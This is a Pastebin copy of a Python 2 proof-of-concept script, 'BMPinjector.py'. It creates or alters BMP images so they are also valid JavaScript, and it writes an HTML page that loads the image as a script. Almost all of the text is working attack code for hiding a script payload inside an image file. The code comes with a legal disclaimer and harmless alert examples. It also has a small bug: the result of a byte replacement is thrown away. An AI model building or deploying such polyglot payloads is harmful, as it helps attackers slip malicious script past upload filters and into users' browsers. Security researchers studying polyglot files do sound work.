Guest User

BMPinjector.py

a guest
Oct 22nd, 2013
7,474
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python2
  2. #============================================================================================================#
  3. #======= Simply injects a JavaScript Payload into a BMP. ====================================================#
  4. #======= The resulting BMP must be a valid (not corrupted) BMP. =============================================#
  5. #======= Author: marcoramilli.blogspot.com ==================================================================#
  6. #======= Version: PoC (don't even think to use it in development env.) ======================================#
  7. #======= Disclaimer: ========================================================================================#
  8. #THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
  9. #IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
  10. #WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  11. #DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
  12. #INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
  13. #(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  14.                                 #SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
  15.                                 #HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
  16. #STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
  17. #IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  18. #POSSIBILITY OF SUCH DAMAGE.
  19. #===========================================================================================================#
  20. import argparse
  21. import os
  22.  
  23. #---------------------------------------------------------
  24. def _hexify(num):
  25.     """
  26.     Converts and formats to hexadecimal
  27.     """
  28.     num = "%x" % num
  29.     if len(num) % 2:
  30.         num = '0'+num
  31.     return num.decode('hex')
  32.  
  33. #---------------------------------------------------------
  34. #Example payload: "var _0xe428=[\""+ b'\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64' + "\"]
  35. #;alert(_0xe428[0]);"
  36. def _generate_and_write_to_file(payload, fname):
  37.     """
  38.     Generates a fake but valid BMP within scriting
  39.     """
  40.     f = open(fname, "wb")
  41.     header = (b'\x42\x4D'  #Signature BM
  42.                         b'\x2F\x2A\x00\x00' #Header File size, but encoded as /* <-- Yes it's a valid header
  43.                         b'\x00\x00\x00\x00' #Reserved
  44.                         b'\x00\x00\x00\x00' #bitmap data offset
  45.                         b''+ _hexify( len(payload) ) + #bitmap header size
  46.                       b'\x00\x00\x00\x14' #width 20pixel .. it's up to you
  47.                         b'\x00\x00\x00\x14' #height 20pixel .. it's up to you
  48.                       b'\x00\x00' #nb_plan 
  49.                         b'\x00\x00' #nb per pixel
  50.                         b'\x00\x10\x00\x00' #compression type
  51.                         b'\x00\x00\x00\x00' #image size .. its ignored
  52.                         b'\x00\x00\x00\x01' #Horizontal resolution
  53.                         b'\x00\x00\x00\x01' #Vertial resolution
  54.                         b'\x00\x00\x00\x00' #number of colors
  55.                         b'\x00\x00\x00\x00' #number important colors
  56.                         b'\x00\x00\x00\x80' #palet colors to be complient
  57.                         b'\x00\x80\xff\x80' #palet colors to be complient
  58.                         b'\x80\x00\xff\x2A' #palet colors to be complient
  59.                         b'\x2F\x3D\x31\x3B' #*/=1;
  60.                         )
  61.     # I made this explicit, step by step .
  62.     f.write(header)
  63.     f.write(payload)
  64.     f.close()
  65.     return True
  66.  
  67. #---------------------------------------------------------
  68. def _generate_launching_page(f):
  69.     """
  70.     Creates the HTML launching page
  71.     """
  72.  
  73.     htmlpage ="""
  74.                                 <html>
  75.                                 <head><title>Opening an image</title> </head>
  76.                                 <body>
  77.                                     <img src=\"""" + f + """\"\>
  78.                                     <script src= \"""" + f + """\"> </script>
  79.                                 </body>
  80.                                 </html>
  81.                         """
  82.     html = open("run.html", "wb")
  83.     html.write(htmlpage);
  84.     html.close()
  85.     return True
  86.  
  87. #---------------------------------------------------------
  88. def _inject_into_file(payload, fname):
  89.     """
  90.     Injects the payload into existing BMP
  91.     NOTE: if the BMP contains \xFF\x2A might caouse issues
  92.     """
  93.     # I know, I can do it all in memory and much more fast.
  94.     # I wont do it here.
  95.     f = open(fname, "r+b")
  96.     b = f.read()
  97.     b.replace(b'\x2A\x2F',b'\x00\x00')
  98.     f.close()
  99.  
  100.     f = open(fname, "w+b")
  101.     f.write(b)
  102.     f.seek(2,0)
  103.     f.write(b'\x2F\x2A')
  104.     f.close()
  105.  
  106.     f = open(fname, "a+b")
  107.     f.write(b'\xFF\x2A\x2F\x3D\x31\x3B')
  108.     f.write(payload)
  109.     f.close()
  110.     return True
  111.  
  112.  
  113. #---------------------------------------------------------
  114. if __name__ == "__main__":
  115.     parser = argparse.ArgumentParser()
  116.     parser.add_argument("filename",help="the bmp file name to be generated/or infected")
  117.     parser.add_argument("js_payload",help="the payload to be injected. For exmample: \"alert(\"test\");\"")
  118.     parser.add_argument("-i", "--inject-to-existing-bmp", action="store_true", help="inject into the current bitmap")
  119.     args = parser.parse_args()
  120.     print("""
  121.                     |======================================================================================================|
  122.                     | [!] legal disclaimer: usage of this tool for injecting malware to be propagated is illegal.          |
  123.                     | It is the end user's responsibility to obey all applicable local, state and federal laws.            |
  124.                     | Authors assume no liability and are not responsible for any misuse or damage caused by this program  |
  125.                     |======================================================================================================|
  126.                     """)
  127.     if args.inject_to_existing_bmp:
  128.          _inject_into_file(args.js_payload, args.filename)
  129.     else:
  130.         _generate_and_write_to_file(args.js_payload, args.filename)
  131.    
  132.     _generate_launching_page(args.filename)
  133.     print "[+] Finished!"
RAW Paste Data